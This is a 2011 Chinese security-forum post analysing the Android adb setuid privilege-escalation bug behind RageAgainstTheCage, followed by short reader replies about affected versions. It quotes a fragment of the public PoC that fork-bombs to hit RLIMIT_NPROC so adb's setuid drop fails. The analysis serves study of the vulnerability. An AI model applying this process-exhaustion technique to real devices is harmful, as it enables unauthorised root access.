[原创]Android adb setuid提权漏洞的分析-Android安全-看雪-安全社区|安全招聘|kanxue.com

[原创]Android adb setuid提权漏洞的分析

发表于: 2011-7-7 13:03 25928

[原创]Android adb setuid提权漏洞的分析

Claud

2011-7-7 13:03

25928

几个月前写的。发在了我的博客上：
http://blog.claudxiao.net/2011/04/android-adb-setuid/
前面有个帖子讨论到提权问题，所以转过来。

——————————————————————————

去年的Android adb setuid提权漏洞被用于各类root刷机，漏洞发现人Sebastian Krahmer公布的利用工具RageAgainstTheCage（rageagainstthecage-arm5.bin）被用于z4root等提权工具、Trojan.Android.Rootcager等恶意代码之中。下面我们来分析这一漏洞的产生原因。

The Android Exploid Crew小组在后来发布了一份PoC代码：rageagainstthecage.c。从这份代码开始着手。

在main(:72)函数中，首先获取了RLIMIT_NPROC的值(:83)，这个值是Linux内核中定义的每个用户可以运行的最大进程数。

然后，调用find_adb()函数(:94)来搜索Android系统中adb进程的PID，具体而言，该函数读取每个进程对应的文件的/proc/<pid>/cmdline，根据其是否等于”/sbin/adb”来判断是否adb进程。

接下来，fork了一个新的进程(:109)，父进程退出，而子进程继续。接下来，在113行创建一个管道。

rageagainstthecage.c

if (fork() > 0)
    exit(0);
  
setsid();
pipe(pepe);

if (fork() == 0) {
    close(pepe[0]);
    for (;;) {
        if ((p = fork()) == 0) {
            exit(0);
        } else if (p < 0) {
            if (new_pids) {
                printf("\n[+] Forked %d childs.\n", pids);
                new_pids = 0;
                write(pepe[1], &c, 1);
                close(pepe[1]);
            }
        } else {
            ++pids;
        }
    }
}

/* then switch user and group to "shell" */
if (setgid(AID_SHELL) != 0) {
    exit(1);
}
if (setuid(AID_SHELL) != 0) {
    exit(1);
}

登录后可查看完整内容

[注意]看雪招聘，专注安全领域的专业人才平台！

收藏・16

免费・7

支持

赞赏记录

参与人

雪币

留言

时间

Youlor

为你点赞~

2024-5-31 07:35

伟叔叔

为你点赞~

2024-5-31 01:30

心游尘世外

为你点赞~

2024-2-24 00:51

飘零丶

为你点赞~

2024-2-16 00:03

QinBeast

为你点赞~

2024-1-26 05:10

shinratensei

为你点赞~

2024-1-22 00:37

PLEBFE

为你点赞~

2023-3-8 01:45

最新回复 (13)
古越魂雪币： 173 活跃值： (132) 能力值： ( LV7，RANK：100 ) 在线值：发帖 31 回帖 154 粉丝 0 关注私信	古越魂 1 2 楼沙发，O(∩_∩)O哈哈~，顶个 2011-7-7 13:11 0
ZhWeir 雪币： 488 活跃值： (185) 能力值： ( LV9，RANK：260 ) 在线值：发帖 11 回帖 77 粉丝 6 关注私信	ZhWeir 6 3 楼学习了~ 好文章~！这个漏洞已经给补上了吧？ 2011-7-7 16:09 0
kuang110 雪币： 89 活跃值： (205) 能力值： ( LV9，RANK：270 ) 在线值：发帖 18 回帖 339 粉丝 0 关注私信	kuang110 6 4 楼哪个版本的bug呢？求交往 2011-7-7 22:22 0
hacknet 雪币： 80 活跃值： (45) 能力值： ( LV3，RANK：20 ) 在线值：发帖 5 回帖 49 粉丝 1 关注私信	hacknet 5 楼 Sebastian Krahmer是比较NB的，不过看他文章要翻墙，呵呵 2011-7-7 22:46 0
loway 雪币： 227 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 63 粉丝 0 关注私信	loway 6 楼现在逆向手机软件才是未来趋势了 2011-7-11 17:39 0
zapline 雪币： 2362 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 66 回帖 2376 粉丝 0 关注私信	zapline 7 楼好文章！。。 2011-7-12 07:01 0
cghook 雪币： 84 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 38 粉丝 0 关注私信	cghook 8 楼我Ri 掉队了赶紧跟上先从安坐开始 2011-7-12 16:45 0
善良屠夫雪币： 201 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 159 粉丝 0 关注私信	善良屠夫 9 楼谢谢楼主，刚好在学习android 2011-7-17 18:59 0
ziyihou 雪币： 207 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 6 回帖 69 粉丝 0 关注私信	ziyihou 1 10 楼学习了，楼主辛苦 2011-7-17 19:34 0
mguimling 雪币： 24 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 14 粉丝 0 关注私信	mguimling 11 楼这都是发展趋势了，大家加油 2011-7-19 16:41 0
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 160 粉丝 0 关注私信	uing 12 楼紧跟发展趋势... 2011-7-23 08:02 0
loqich 雪币： 952 活跃值： (2011) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 643 粉丝 0 关注私信	loqich 13 楼 2.2及以下好像有这bug 部分2.3版本也有 2011-7-28 12:44 0
swatch 雪币： 151 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	swatch 14 楼 2.3的bug好像利用不了 2011-9-14 15:59 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

Claud

发帖

278

回帖

270

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (13)
古越魂雪币： 173 活跃值： (132) 能力值： ( LV7，RANK：100 ) 在线值：发帖 31 回帖 154 粉丝 0 关注私信	古越魂 1 2 楼沙发，O(∩_∩)O哈哈~，顶个 2011-7-7 13:11 0
ZhWeir 雪币： 488 活跃值： (185) 能力值： ( LV9，RANK：260 ) 在线值：发帖 11 回帖 77 粉丝 6 关注私信	ZhWeir 6 3 楼学习了~ 好文章~！这个漏洞已经给补上了吧？ 2011-7-7 16:09 0
kuang110 雪币： 89 活跃值： (205) 能力值： ( LV9，RANK：270 ) 在线值：发帖 18 回帖 339 粉丝 0 关注私信	kuang110 6 4 楼哪个版本的bug呢？求交往 2011-7-7 22:22 0
hacknet 雪币： 80 活跃值： (45) 能力值： ( LV3，RANK：20 ) 在线值：发帖 5 回帖 49 粉丝 1 关注私信	hacknet 5 楼 Sebastian Krahmer是比较NB的，不过看他文章要翻墙，呵呵 2011-7-7 22:46 0
loway 雪币： 227 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 63 粉丝 0 关注私信	loway 6 楼现在逆向手机软件才是未来趋势了 2011-7-11 17:39 0
zapline 雪币： 2362 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 66 回帖 2376 粉丝 0 关注私信	zapline 7 楼好文章！。。 2011-7-12 07:01 0
cghook 雪币： 84 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 38 粉丝 0 关注私信	cghook 8 楼我Ri 掉队了赶紧跟上先从安坐开始 2011-7-12 16:45 0
善良屠夫雪币： 201 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 159 粉丝 0 关注私信	善良屠夫 9 楼谢谢楼主，刚好在学习android 2011-7-17 18:59 0
ziyihou 雪币： 207 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 6 回帖 69 粉丝 0 关注私信	ziyihou 1 10 楼学习了，楼主辛苦 2011-7-17 19:34 0
mguimling 雪币： 24 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 14 粉丝 0 关注私信	mguimling 11 楼这都是发展趋势了，大家加油 2011-7-19 16:41 0
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 160 粉丝 0 关注私信	uing 12 楼紧跟发展趋势... 2011-7-23 08:02 0
loqich 雪币： 952 活跃值： (2011) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 643 粉丝 0 关注私信	loqich 13 楼 2.2及以下好像有这bug 部分2.3版本也有 2011-7-28 12:44 0
swatch 雪币： 151 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	swatch 14 楼 2.3的bug好像利用不了 2011-9-14 15:59 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[原创]Android adb setuid提权漏洞的分析

账号登录 验证码登录

账号登录

验证码登录